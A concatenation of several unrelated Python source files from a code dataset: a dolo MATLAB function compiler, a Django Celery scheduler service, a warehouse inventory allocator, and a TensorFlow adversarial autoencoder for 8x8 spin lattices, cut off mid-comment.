compile_function_matlab(equations, symbols, arg_names, output_names=None, funname='anonymous'):\n\n from function_compiler_ast import std_date_symbol\n from function_compiler_ast import StandardizeDates\n\n from collections import OrderedDict\n table = OrderedDict()\n\n aa = arg_names\n # if output_names is not None:\n # aa = arg_names + [output_names]\n for a in aa:\n\n symbol_group = a[0]\n date = a[1]\n an = a[2]\n\n for b in symbols[symbol_group]:\n index = symbols[symbol_group].index(b)\n\n table[(b,date)] = (an, 
index)\n\n table_symbols = { k: (std_date_symbol(*k)) for k in table.keys() }\n\n code_preamble = \"\"\n for k,v in table.iteritems():\n std_name = table_symbols[k]\n if v[0] != 'p':\n code_preamble += \"{} = {}(:,{});\\n\".format(std_name, v[0], v[1]+1)\n else:\n code_preamble += \"{} = {}({});\\n\".format(std_name, v[0], v[1]+1)\n\n if output_names:\n out_group, out_time, out_s = output_names\n else:\n out_s = 'out'\n\n code_expr = \"\"\n for i,eq in enumerate(equations):\n expr = str_to_expr(eq)\n sd = StandardizeDates(symbols, arg_names)\n sexpr = sd.visit(expr)\n eq_string = (print_matlab(sexpr))\n if output_names is None:\n code_expr += \"out(:,{}) = {} ;\\n\".format(i+1, eq_string)\n else:\n out_symbol = symbols[out_group][i]\n out_name = std_date_symbol(out_symbol, out_time)\n code_expr += \"{} = {} ;\\n\".format(out_name, eq_string)\n code_expr += \"{}(:,{}) = {} ;\\n\".format(out_s,i+1, out_name)\n\n code = \"\"\"\\\nfunction [{out_s}] = {funname}({args_list})\n\n{preamble}\n\nN = size({first_arg},1);\nout = zeros(N,{n_out});\n{equations}\nend\n\"\"\".format(\n out_s = out_s,\n preamble = code_preamble,\n funname = funname,\n args_list = str.join(', ', [e[2] for e in arg_names]),\n n_out = len(equations),\n first_arg = arg_names[0][2],\n equations = code_expr\n)\n\n return code\n\ndef compile_model_matlab(model):\n\n symbolic_model = model.symbolic\n\n model_type = symbolic_model.model_type\n\n if model_type != 'fga':\n raise Exception(\"For now, only supported model type is fga\")\n\n from collections import OrderedDict\n code_funs = OrderedDict()\n\n\n from dolo.compiler.recipes import recipes\n recipe = recipes['fga']\n symbols = model.symbols\n\n for funname, v in recipe['specs'].iteritems():\n\n spec = v['eqs']\n print(spec)\n if 'complementarities' in v:\n print(\"ignoring complementarities\")\n\n target = v.get('target')\n\n if funname not in symbolic_model.equations:\n continue\n # if not spec.get('optional'):\n # raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname))\n # else:\n # continue\n\n eq_strings = symbolic_model.equations[funname]\n\n eq_strings = [eq.split('|')[0].strip() for eq in eq_strings]\n\n if target is not None:\n eq_strings = [eq.split('=')[1].strip() for eq in eq_strings]\n else:\n for i,eq in enumerate(eq_strings):\n if '=' in eq:\n eq = '({1})-({0})'.format(*eq.split('=')[:2])\n eq_strings[i] = eq\n\n\n funcode = compile_function_matlab(eq_strings, symbols,\n spec, output_names=target, funname=funname)\n\n code_funs[funname] = funcode\n\n\n code = \"\"\"\\\nfunction [model] = construct_model()\n\n functions = struct;\n\"\"\"\n for fn in code_funs.keys():\n code += \" functions.{} = @{};\\n\".format(fn, fn)\n\n code += \"\\n symbols = struct;\\n\"\n for sg, sl in symbols.iteritems():\n code += \" symbols.{} = {{{}}};\\n\".format(sg, str.join(',', [\"'{}'\".format(e) for e in sl]))\n code += \"\\n\"\n code += \"\\n calibration = struct;\"\n for sg, sl in model.calibration.iteritems():\n tv = [str(float(e)) for e in sl]\n tv = '[{}]'.format(str.join(', ', tv))\n code += \" calibration.{} = {};\\n\".format(sg, tv);\n\n # print covariances\n tv = [str(float(e)) for e in model.covariances.flatten()]\n tv = '[{}]'.format(str.join(', ', tv))\n n_c = model.covariances.shape[0]\n code += \"\\n covariances = reshape( {} , {}, {})\\n\".format(tv, n_c, n_c)\n\n code += \"\"\"\\\n\n model = struct;\n model.functions = functions;\n model.calibration = calibration;\n model.symbols = symbols;\n model.covariances = 
covariances;\n\nend\n\n\"\"\"\n\n for fn, fc, in code_funs.iteritems():\n code += '\\n'\n code += fc\n\n return code\n\n\n\nif __name__ == '__main__':\n\n s1 = '(x0(1) + x1 / y0)**p0 - (x0(1) + x1 / y0)**(p0-1) '\n s2 = 'x0 + x1 / y1(+1)'\n\n expressions = [s1,s2]\n\n from collections import OrderedDict\n\n symbols = OrderedDict(\n states = ('x0', 'x1'),\n controls = ('y0','y1'),\n parameters = ('p0','p1')\n )\n\n arg_names = [\n ('states', 0, 's'),\n ('controls', 0, 'x'),\n ('states', 1, 'S'),\n ('controls', 1, 'X'),\n ('parameters', 0, 'p')\n ]\n\n import time\n\n t0 = time.time()\n resp = compile_function_matlab([s1,s2], symbols, arg_names) #funname='arbitrage', use_numexpr=True, return_ast=True)\n\n\n ###\n\n\n s1 = '(x0(1) + x1 / y0)**p0 - (x0(1) + x1 / y0)**(p0-1) '\n s2 = 'x0 + x1 / y1'\n\n expressions = [s1,s2]\n\n symbols = OrderedDict(\n states = ('x0', 'x1'),\n controls = ('y0','y1'),\n parameters = ('p0','p1')\n )\n\n arg_names = [\n ('states', 0, 's'),\n ('controls', 0, 'x'),\n ('states', 1, 'S'),\n ('parameters', 0, 'p')\n ]\n\n import time\n\n t0 = time.time()\n resp = compile_function_matlab([s1,s2], symbols, arg_names, output_names=('controls',1,'Y')) #funname='arbitrage', use_numexpr=True, return_ast=True)\n\n print(resp)\n\n print('***************#######################************************')\n\n from dolo import *\n model = yaml_import('examples/models/rbc.yaml')\n print( compile_model_matlab(model) )\n","sub_path":"dolo/compiler/function_compiler_matlab.py","file_name":"function_compiler_matlab.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"392145093","text":"from django_celery_beat.models import PeriodicTask, IntervalSchedule\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom api.scheduler.models import Scheduler\nimport datetime\nimport json\nimport uuid\nfrom .serializers import SchedulerSerializers\n\n\nregistered_task = 'scheduler_task'\ndatetime_now = datetime.datetime.now().replace(microsecond=0)\n\nfrom django.contrib.gis.geos import GEOSGeometry\ndef create_scheduler(aoi, product_name, start_time=datetime_now, every=1, period='minutes'):\n name = uuid.uuid4()\n kwargs_task = json.dumps({\n 'product_name': product_name,\n 'aoi': aoi\n })\n interval = IntervalSchedule.objects.create(every=every, period=period)\n PeriodicTask.objects.get_or_create(name=name, task=registered_task, interval=interval, start_time=start_time, kwargs=kwargs_task)\n Scheduler.objects.get_or_create(name=name, task=registered_task, start_time=start_time,\n every=every, period=period, aoi=GEOSGeometry(aoi), product_name=product_name)\n return {\n 'Status': 'Success'\n }\n\ndef list_scheduler():\n try:\n response = SchedulerSerializers(instance=Scheduler.objects, many=True).data\n return response\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\ndef get_scheduler(id):\n try:\n response = SchedulerSerializers(instance=Scheduler.objects.get(pk=id), many=False).data\n return response\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\ndef update_scheduler(id, every=None, period=None, enabled=None):\n try:\n scheduler = Scheduler.objects.get(pk=id)\n periodic_task = PeriodicTask.objects.get(name=scheduler.name)\n interval = IntervalSchedule.objects.get(pk=periodic_task.interval_id)\n if every is not None:\n scheduler.every = every\n interval.every = 
every\n if period is not None:\n scheduler.period = period\n interval.period = period\n if enabled is not None:\n scheduler.enabled = enabled\n periodic_task.enabled = enabled\n periodic_task.save()\n interval.save()\n scheduler.save()\n return {\n 'Status': 'Success',\n 'message': 'Update scheduler successfully '\n }\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\ndef delete_scheduler(id):\n try:\n scheduler = Scheduler.objects.get(pk=id)\n periodic_task = PeriodicTask.objects.get(name=scheduler.name)\n interval = IntervalSchedule.objects.get(pk=periodic_task.interval_id)\n\n scheduler.delete()\n periodic_task.delete()\n interval.delete()\n print('I do this')\n return {\n 'status': 'Success',\n 'message': 'Delete Scheduler successfully'\n }\n\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\n\n# TEST\n\nfrom celery import task\nfrom celery.utils.log import get_task_logger\n\n# @task(name='get_date_now')\n# def get_date_now():\n# return datetime.datetime.now()\n# logger = get_task_logger(__name__)\n#\n# @task(name='test_scheduler')\n# def test_scheduler(x):\n# time = datetime.datetime.now().replace(microsecond=0)\n# logger.info(time)\n# return x + 1000\n\n\n# def create_scheduler(x, start_time=datetime_now, every=1, period='minutes'):\n# name = uuid.uuid4()\n# interval = IntervalSchedule.objects.get_or_create(every=every, period=period)\n# # time = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\")\n# kwargs_task = json.dumps({\n# 'x': x\n# })\n# print(kwargs_task)\n# PeriodicTask.objects.get_or_create(name=name, task=registered_task, interval=interval[0], start_time=start_time, kwargs=kwargs_task)\n# # Scheduler.objects.get_or_create(name=name, task=registered_task, start_time=start_time, every=every, period=period, aoi=aoi, product_name=product_name)\n# return {\n# 'Status': 'Success'\n# }\n\n\n","sub_path":"api/scheduler/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"118304133","text":"import copy\n\n#Inventory class has all the components that compute the cheapest order available (via first warehouse in the list/input).\nclass Inventory(object):\n def __init__(self, order, inventory):\n\n # This is the constructor for the allocator, in this we set the self inventory and self order to the given order of user (inputs provided)\n # if the inventory details or order is empty/not provided, it will return an empty list. \n self.inventory=inventory\n self.order=order\n \n #if not self.order or not self.inventory:\n # return []\n\n def OrderShipment(self):\n \n #OrderShipment: This member function/function checks if the order is available in warehouses or not.\n #--The conditions that this function fullfills are:\n #----1. If the order and inventory details are provided correctly or not. If not, then it returns an empty list. \n #----2. In case if the order is not available in any warehouse, it returns an empty list\n #----3. Since we are considering that warehouses are orderd in less to most expensive basis, so if the order can be fulfilled by the first warehouse that comes in the list, all the order is sent from that warehouse.\n #----4. 
If the order cannot be fulfilled by a single warehouse, whatever is available in that warehouse is sent from there and the remainder is sourced from the next least expensive warehouse in the list.\n        #----5. Once the order has been processed, a counter-check is made to verify that all the ordered items were allocated. If not, it returns an empty list.\n\n        # if the inventory details or order is empty/not provided, it will return an empty list.\n        if not self.order or not self.inventory:\n            return [] \n        \n        #if inventory and order details are provided correctly, further calculations are done.\n        else:\n            \n            # deep-copy the inventory details (and copy the order) so the caller's data is not mutated below\n            warehouses= copy.deepcopy(self.inventory)\n            checkorder= copy.copy(self.order)\n            \n            #a list to hold the shipment details when they are confirmed (if available) \n            confirmshipment=[]\n\n            #iterating through each warehouse\n            for warehouse in warehouses:\n\n                #dictionary that stores the items that can be shipped from this warehouse\n                availablestock={}\n\n                #iterating through the user's order list/input\n                for key in checkorder.keys():\n                    #if the item is needed/in the order list\n                    if checkorder[key]>0:\n                        #check if the item checkorder[key] is available in this warehouse\n                        if key in warehouse['inventory'].keys():\n\n                            #check if the warehouse has enough of this item to fulfill the demand or not\n                            if warehouse['inventory'][key]>checkorder[key]:\n\n                                #availability of item = true\n                                availablestock[key]= checkorder[key]\n\n                                #subtract the amount of item needed from the amount of item available in that warehouse/inventory.\n                                warehouse['inventory'][key]= warehouse['inventory'][key]-checkorder[key]\n\n                                #it is set to zero so that the next item can be searched/checked\n                                checkorder[key]=0\n                            else:\n\n                                #if the warehouse doesn't have the complete stock required by the order, we take whatever it can fulfill and search the next warehouse to complete the order\n                                availablestock[key]=warehouse['inventory'][key]\n\n                                #subtract from what's required so that what's left can be searched in the next warehouse\n                                checkorder[key]=checkorder[key] - warehouse['inventory'][key]\n\n                                #set the amount of item in that warehouse=0 because we'll take what it can fulfill.\n                                warehouse['inventory'][key]=0\n                #confirm this warehouse's contribution once it has been searched (inside the loop, so every warehouse that ships something is recorded)\n                if availablestock:\n                    confirmshipment.append({warehouse['name']:availablestock})\n            #counter-check whether anything is still left in the order list; if so, return an empty list. 
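\n            # (Because the warehouse list is given cheapest-first — see point 3 above — this single greedy pass is cost-optimal and no price comparison is needed inside the loop.)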
\n        for key in checkorder.keys():\n            if checkorder[key]>0:\n                return [] \n        # All clear: return the shipment list of {warehouse name: allocated items} entries. \n        return confirmshipment\n\nif __name__ == '__main__':\n    Myorder=Inventory({ 'apple': 2 }, [{ 'name': 'owd', 'inventory': { 'apple': 5 } }])\n    print (\"Order Details:\", Myorder.OrderShipment())\n\n    SecondOrder=Inventory({ 'apple': 1 }, [{ 'name': 'owd', 'inventory': { 'apple': 0 } }])\n    print (\"Second Order Details: \", SecondOrder.OrderShipment())\n\n    ThirdOrder=Inventory({ 'apple': 1 }, [{ 'name': 'owd', 'inventory': { 'apple': 1 } }])\n    print (\"Third Order Details: \", ThirdOrder.OrderShipment())\n\n    FourthOrder=Inventory({ 'apple': 2, 'berry': 5, 'banana': 15 }, [{ 'name': 'owd', 'inventory': { 'apple': 15, 'berry': 25, 'banana': 30, 'Mangoes': 50 } }])\n    print (\"Fourth Order Details:\", FourthOrder.OrderShipment())\n\n","sub_path":"inventory-allocator/src/MyInventoryAllocator.py","file_name":"MyInventoryAllocator.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"562415659","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport os\nimport data_loader\nimport random\nimport math\nimport get_parameters\nimport pickle\nimport gzip\n\nlattice_size = 8\nlearning_rate = 1e-4\nbatch_size = 100\nn_z = 1\nx = tf.placeholder(name='x', dtype=tf.float32, shape=[None, 64])\ny = tf.placeholder(name='y', dtype=tf.float32, shape=[None,1])\nz_prior = tf.placeholder(name='z_prior', dtype=tf.float32, shape=[1,batch_size])\nloss_type = 'log_gaussian' #'Binary_crossentropy'\ndatapoints = 320000\nn_temps = 32\nT_vals = np.linspace(-1.0,0.9,n_temps)\nIs_train = True\nwith tf.variable_scope('Encoder'):\n    fully_connected1 = tf.contrib.layers.fully_connected(inputs=x, num_outputs=128, activation_fn=tf.tanh,scope=\"Fully_Conn1\")\n    fully_connected2 = tf.contrib.layers.fully_connected(inputs=fully_connected1, num_outputs=64, activation_fn=tf.tanh,scope=\"Fully_Conn2\")\n    fully_connected3 = tf.contrib.layers.fully_connected(inputs=fully_connected2, num_outputs=20, activation_fn=tf.tanh,scope=\"Fully_Conn3\")\n    z_mu = tf.contrib.layers.fully_connected(inputs=fully_connected3, num_outputs=n_z, activation_fn=None,scope=\"Fully_Conn2_mu\")\n    z_log_sigma_sq = tf.contrib.layers.fully_connected(inputs=fully_connected3, num_outputs=n_z, activation_fn=None,scope=\"Fully_Conn2_sig\")\n\n    eps = tf.random_normal(shape=tf.shape(z_log_sigma_sq),mean=0, stddev=1.0, dtype=tf.float32)\n    z = z_mu + tf.sqrt(tf.exp(z_log_sigma_sq)) * eps\n\nepsilon = 1e-10\nu=tf.concat([y,z],axis=1)\nwith tf.variable_scope('Decoder'):\n    fully_connected_decoder1 = tf.contrib.layers.fully_connected(inputs=u, num_outputs=20, activation_fn=tf.tanh,scope=\"Fully_Conn1_decoder\")\n    fully_connected_decoder2 = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder1,num_outputs=64, activation_fn=tf.tanh,scope=\"Fully_Conn2_decoder\")\n    fully_connected_decoder3 = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder2,num_outputs=128,activation_fn=tf.tanh,scope=\"Fully_Conn3_decoder\")\n\n    if loss_type == 'Binary_crossentropy':\n        x_hat = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder3, num_outputs=64, activation_fn=tf.sigmoid,scope=\"Fully_Conn2_decoder_out\")\n        recon_loss =-1*tf.reduce_sum( x*tf.log(epsilon+x_hat) +(1-x)*tf.log(epsilon+1-x_hat),axis=1)#\n    elif loss_type == 
'log_gaussian':\n        x_mu = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder3, num_outputs=64, activation_fn=tf.sigmoid,scope=\"Fully_Conn2_decoder_mu\")\n        x_log_sigma_sq = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder3, num_outputs=64, activation_fn=tf.tanh,scope=\"Fully_Conn2_decoder_std\")\n        x_hat =tf.random_normal(shape = tf.shape(x_mu) ,mean = x_mu, stddev =tf.sqrt(tf.exp(-8*x_log_sigma_sq)), dtype = tf.float32 )\n\nwith tf.variable_scope('vae_loss'):\n    recon_loss = 0.5*tf.reduce_mean(tf.reduce_sum( ((x-x_mu)**2)/tf.exp(-8*x_log_sigma_sq)+1.837- 8*x_log_sigma_sq ,axis=1)) #1.837= ln(2*pi)\n\ndef discriminator(g,reuse = None):\n    with tf.variable_scope('Discriminator', reuse=reuse):\n        net = tf.contrib.layers.fully_connected(inputs=g , num_outputs=40, activation_fn=tf.nn.relu ,scope=\"inp\")\n        net1 = tf.contrib.layers.fully_connected(inputs=net , num_outputs=32, activation_fn=tf.nn.relu ,scope=\"hid1\")\n        net2 = tf.contrib.layers.fully_connected(inputs=net1, num_outputs=10, activation_fn=tf.nn.relu ,scope=\"hid2\")\n        d_out = tf.contrib.layers.fully_connected(inputs=net2, num_outputs=1 , activation_fn=None ,scope=\"prob\")\n        return d_out\n\ndef loss_func(logits_in,labels_in):\n    return tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_in,labels=labels_in))\n\ndef return_intersection(hist_1, hist_2):\n    minima = np.minimum(hist_1, hist_2)\n    intersection = np.true_divide(np.sum(minima), np.sum(hist_2))\n    return intersection\n\n# z_prior = tf.random_normal(shape = tf.shape(z) ,mean = 0, stddev =1, dtype = tf.float32 )\nd_real = discriminator(g=z_prior)\nz_cap = tf.reshape(tf.squeeze(z),[1,batch_size])\nd_fake = discriminator(g=z_cap,reuse = True)\n\nwith tf.variable_scope('lossD'):\n    D_real_loss=10*loss_func(d_real,tf.ones_like(d_real)*0.9) #Smoothing for generalization\n    D_fake_loss=10*loss_func(d_fake,tf.zeros_like(d_fake))\n    train_d_loss=D_real_loss+D_fake_loss\nwith tf.variable_scope('JSloss'):\n    JS_loss = 10*loss_func(d_fake,tf.ones_like(d_fake))\n\nencoder_param = tf.trainable_variables(scope='Encoder')\ndecoder_param = tf.trainable_variables(scope='Decoder')\nd_param = tf.trainable_variables(scope='Discriminator')\nprint(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES))\n\nwith tf.variable_scope('optimizer'):\n    # minimize() expects a flat list of variables, so concatenate the encoder and decoder lists\n    vae_optim = tf.train.AdamOptimizer(learning_rate= 1e-4 ).minimize(recon_loss,var_list=encoder_param + decoder_param)\n    d_optim = tf.train.AdamOptimizer(learning_rate= 1e-4 ).minimize(train_d_loss, var_list=d_param)\n    enc_optim = tf.train.AdamOptimizer(learning_rate= 1e-4 ).minimize(JS_loss, var_list=encoder_param)\n    saver = tf.train.Saver()\n\nwith tf.Session() as sess:\n    if Is_train == False:\n        saver.restore(sess,'./GANmodel.ckpt')\n    if Is_train == True:\n        writer = tf.summary.FileWriter('./graphs', sess.graph)\n        training_data = data_loader.load_data_wrapper()\n        tvals = np.repeat(np.linspace(-1.0,0.9,32),10000)\n        c = list(zip(training_data,tvals))\n        random.shuffle(c)\n        training_data, tvals = zip(*c)\n        print(len(training_data),len(tvals))\n        m = tf.placeholder(tf.float32,[datapoints, 64])\n        n = tf.placeholder(tf.float32,[datapoints, 1])\n        dataset = tf.data.Dataset.from_tensor_slices((m,n))\n        dataset = dataset.prefetch(buffer_size=1000)\n        dataset = dataset.batch(batch_size)\n        iterator = dataset.make_initializable_iterator()\n        next_batch = iterator.get_next()  # renamed from 'next' to avoid shadowing the builtin\n        print(\"============< WARNING >===============\")\n        sess.run(tf.global_variables_initializer())\n        print(\"==========< Model DELETED >===========\")\n    
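# NOTE: a small Gaussian jitter (0.01*randn) is added to the temperature labels fed in below;\n    # this looks intended to smooth the conditional input and is this script's choice, not a tf.data requirement.\n    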
sess.run(iterator.initializer,feed_dict = {m:training_data, n:np.array(tvals).reshape(datapoints,1) + 0.01*np.random.randn(datapoints,1)})\n        print(\"Session initialized :)\")\n        print(\"Iterator initialized :)\")\n\n        for i in range(20000):\n            if i>0 and i % (datapoints // batch_size) == 0:\n                sess.run(iterator.initializer, feed_dict = {m:training_data, n:np.array(tvals).reshape(datapoints,1) + 0.01*np.random.randn(datapoints,1) })\n            g,h = sess.run(next_batch)\n\n            VAE_loss_curr,_ = sess.run([recon_loss,vae_optim], feed_dict={x:g,y:h})\n            # for _ in range(3):\n            z_p = np.random.uniform(-1,1,size=[1,batch_size ])\n            D_loss_curr,_ = sess.run([train_d_loss,d_optim], feed_dict={x:g,z_prior:z_p})\n            # z_p = np.random.normal(size=[batch_size, n_z])\n            # adversarial step: train the encoder against the discriminator via the JS loss\n            JS_loss_curr,_ = sess.run([JS_loss,enc_optim], feed_dict={x:g,z_prior:z_p})\n            if i % 1000 == 0:\n                print('Iter: {}'.format(i),' D loss: {:.4}'. format(D_loss_curr),' Rec_loss: {:.4}'.format(VAE_loss_curr))\n\n        save_path = saver.save(sess, \"./GANmodel.ckpt\")\n        print(\"Model saved in path: %s\" % save_path)\n\n    n_samples = (32,20)\n    if n_z == 1:\n        T_vals = np.linspace(-1,0.9,32)\n        zsample = np.mgrid[-1.0:0.9:0.059375, -2.0:6.0:0.4].reshape(2,-1).T#np.random.normal(size = [n_samples[0]*n_samples[1],n_z])\n        print(zsample)\n        if loss_type == 'Binary_crossentropy':\n            Gsample = sess.run(fully_connected_decoder1, feed_dict={z: zsample[:,1].reshape(zsample.shape[0],1), y:zsample[:,0].reshape(zsample.shape[0],1) + 0.01*np.random.randn(zsample.shape[0],1)})\n            Gsample2 = sess.run(fully_connected_decoder2, feed_dict={fully_connected_decoder1: Gsample })\n            gsample = sess.run(x_hat, feed_dict={fully_connected_decoder2: Gsample2 })\n        elif loss_type == 'log_gaussian':\n            gsample = sess.run(x_hat,feed_dict={z:zsample[:,1].reshape(zsample.shape[0],1),y:zsample[:,0].reshape(zsample.shape[0],1) } )\n    else:\n        T_vals = np.linspace(-1,0.9,32)\n        n_samples = (32,20)\n        zsample = np.random.normal(size = [n_samples[0]*n_samples[1],n_z])#np.mgrid[-1.0:0.9:0.059375, -2.0:2.0:0.2].reshape(2,-1).T\n        print(zsample)\n        if loss_type == 'Binary_crossentropy':\n            Gsample = sess.run(fully_connected_decoder1, feed_dict={z: zsample[:,1].reshape(zsample.shape[0],1), y:zsample[:,0].reshape(zsample.shape[0],1) + 0.01*np.random.randn(zsample.shape[0],1)})\n            Gsample2 = sess.run(fully_connected_decoder2, feed_dict={fully_connected_decoder1: Gsample })\n            gsample = sess.run(x_hat, feed_dict={fully_connected_decoder2: Gsample2 })\n        elif loss_type == 'log_gaussian':\n            gsample = sess.run(x_hat,feed_dict={z:zsample,y:np.repeat(T_vals,n_samples[1]).reshape(n_samples[0]*n_samples[1],1) } )\n\n    gsample = gsample.reshape(zsample.shape[0],lattice_size,lattice_size)\n\n    mean_magnetization = []\n    Magnetization = get_parameters.get_mean_magnetization(gsample)\n    Magnetization_direction = get_parameters.get_magnetization_direction(gsample)\n    energy = get_parameters.get_energy(gsample)\n    if n_z == 1:\n        for d in range(0,n_samples[0],5):\n            plt.plot(zsample[:n_samples[1],1],Magnetization[0][0][d*n_samples[1]:(d+1)*n_samples[1]],label = d) #all values\n        plt.xlabel('Latent Variable value', fontsize=12)\n        plt.ylabel('Magnetization of a single sample generated by the network', fontsize=10)\n        plt.legend()\n        plt.show()\n        for d in range(n_samples[0]):\n            plt.plot(zsample[:n_samples[1],1],Magnetization_direction[d*n_samples[1]:(d+1)*n_samples[1]])\n        plt.show()\n        plt.hist(energy,bins =100)\n        plt.legend()\n        plt.show()\n        n_maps = 2000 #no of mappings per temp\n        for d in range(0,n_samples[1]):\n            
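# each trace fixes one latent value (index d) and sweeps it across the 32 conditioned temperatures\n            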
plt.plot(zsample[d:zsample.shape[0]:n_samples[1],0],Magnetization[0][0][d:zsample.shape[0]:n_samples[1]],label = d)\n plt.legend(loc='best')\n plt.show()\n if Is_train == False:\n f = open('./DATA/8by8lattices.pkl', 'rb')\n if (f.read(2) == '\\x1f\\x8b'):\n f.seek(0)\n gzip.GzipFile(fileobj=f)\n else:\n f.seek(0)\n training_data = pickle.load(f, encoding=\"latin1\")\n training_data = np.reshape(training_data,(320000, 64))\n for d in range(0,32,4):\n sampledz = sess.run(u,feed_dict={x:training_data[10000*d+500:10000*d+500+n_maps],y:np.repeat(T_vals[d],n_maps).reshape(n_maps,1)})\n plt.scatter(sampledz[:,0],sampledz[:,1],label = d)\n plt.legend()\n plt.show()\n else:\n for d in range(0,n_samples[0],5):\n plt.plot(Magnetization[0][0][d*n_samples[1]:(d+1)*n_samples[1]],label = d) #all values\n plt.xlabel('Latent Variable value', fontsize=12)\n plt.ylabel('Magnetization of a single sample generated by the network', fontsize=10)\n plt.legend()\n plt.show()\n for d in range(n_samples[0]):\n plt.plot(Magnetization_direction[d*n_samples[1]:(d+1)*n_samples[1]])\n plt.show()\n plt.hist(energy,bins =100)\n plt.legend()\n plt.show()\n n_maps = 2000 #no of mappings per temp\n for d in range(0,n_samples[1]):\n plt.plot(Magnetization[0][0][d:zsample.shape[0]:n_samples[1]],label = d)\n plt.legend(loc='best')\n plt.show()\n if Is_train == False:\n f = open('./DATA/8by8lattices.pkl', 'rb')\n if (f.read(2) == '\\x1f\\x8b'):\n f.seek(0)\n gzip.GzipFile(fileobj=f)\n else:\n f.seek(0)\n training_data = pickle.load(f, encoding=\"latin1\")\n training_data = np.reshape(training_data,(320000, 64))\n for d in range(0,32,4):\n sampledz = sess.run(u,feed_dict={x:training_data[10000*d+500:10000*d+500+n_maps],y:np.repeat(T_vals[d],n_maps).reshape(n_maps,1)})\n plt.scatter(sampledz[:,0],sampledz[:,1],label = d)\n plt.legend()\n plt.show()\n # Mdist = []\n # Edist = []\n # mean_magnetization = []\n # var_magnetization = []\n # mean_magnetization_data = []\n # var_magnetization_data = []\n # mean_energy = []\n # var_energy = []\n # mean_energy_data = []\n # var_energy_data = []\n #\n # n = n_samples[1]\n # if Is_train == False:\n # f = open('./DATA/8by8lattices.pkl', 'rb')\n # if (f.read(2) == '\\x1f\\x8b'):\n # f.seek(0)\n # gzip.GzipFile(fileobj=f)\n # else:\n # f.seek(0)\n # training_data = pickle.load(f, encoding=\"latin1\")\n # training_data = np.reshape(training_data,(320000, 64))\n # for i in range(0,n_samples[0]):\n # Magnetization = get_parameters.get_mean_magnetization(gsample[i*n_samples[1]:(i+1)*n_samples[1]])\n # Magnetization_direction = get_parameters.get_magnetization_direction(gsample[i*n_samples[1]:(i+1)*n_samples[1]])\n # energy = get_parameters.get_energy(gsample[i*n_samples[1]:(i+1)*n_samples[1]])\n # print(i)\n # if Is_train == False:\n # fig1 = plt.figure(1)\n # plt.plot(zsample[:n_samples[1],1],Magnetization[0][0],label = (T_vals[i]+1.1))\n # fig2 = plt.figure(2)\n # plt.plot(zsample[:n_samples[1],1],Magnetization_direction,label = (T_vals[i]+1.1))\n # if Is_train == True:\n # lattices = np.array(training_data[i*10000:i*10000+n]).reshape(n,lattice_size,lattice_size)\n # energy_data = get_parameters.get_energy(lattices)\n # thetas_data = get_parameters.get_magnetization_direction(lattices)\n # [mag_data,mag_mean,mag_std] = get_parameters.get_mean_magnetization(lattices)\n # plt.subplot(3,1,1)\n # plt.hist(Magnetization[0][0][i*n_samples[1]:(i+1)*n_samples[1]],bins =20,color='b',range=[0, 1],alpha=0.5)\n # plt.hist(mag_data ,bins =20,color='g',range=[0, 1],alpha=0.5)\n # plt.ylabel('Magnetization ')\n 
#\n # mean_magnetization.append(Magnetization[1])\n # var_magnetization.append(Magnetization[2])\n # mean_magnetization_data.append(mag_mean)\n # var_magnetization_data.append(mag_std)\n #\n # mean_energy.append(np.mean(energy))\n # var_energy.append(np.std(energy))\n # mean_energy_data.append(np.mean(energy_data))\n # var_energy_data.append(np.std(energy_data))\n #\n # plt.subplot(3,1,2)\n # plt.plot(Magnetization_direction,linestyle='dotted',color='b')\n # plt.plot(thetas_data, linestyle='dotted',color='g')\n # plt.ylabel('Magnetization direction')\n # plt.ylim((-360,0))\n # # plt.title('Magnetization direction')\n #\n # plt.subplot(3,1,3)\n # plt.hist(energy ,bins =300,color='b',range=[-130, 20],alpha =0.5)\n # plt.hist(energy_data,bins =300,color='g',range=[-130, 20],alpha=0.5)\n # plt.ylabel('Energy')\n #\n # # plt.show()\n # plt.savefig('./out/combined@ %f.png'%((T_vals[i]+1.1)), bbox_inches='tight')\n # plt.close()\n # Mhist_1,_ = np.histogram(Magnetization[0][0],bins =20,range=[0, 1])\n # Mhist_2,_ = np.histogram(mag_data ,bins =20,range=[0, 1])\n # Mdist.append(return_intersection(Mhist_1,Mhist_2))\n #\n # Ehist_1,_ = np.histogram(energy ,bins =300,range=[-130, 20])\n # Ehist_2,_ = np.histogram(energy_data,bins =300,range=[-130, 20])\n # Edist.append(return_intersection(Ehist_1,Ehist_2))\n # if Is_train ==False:\n # plt.xlabel('Latent Variable value', fontsize=12)\n # plt.ylabel('Magnetization of a single sample generated by the network', fontsize=10)\n # plt.legend()\n # plt.show()\n # if Is_train == True:\n # print(\"Magnetization Accuracy\")\n # print(Mdist)\n # print(mean_magnetization)\n # print(mean_magnetization_data)\n # print(var_magnetization)\n # print(var_magnetization_data)\n # plt.errorbar(T_vals+1.1,mean_magnetization,var_magnetization,color='b',label='Samples')\n # plt.errorbar(T_vals+1.1,mean_magnetization_data,var_magnetization_data,color = 'g',label='Data')\n # 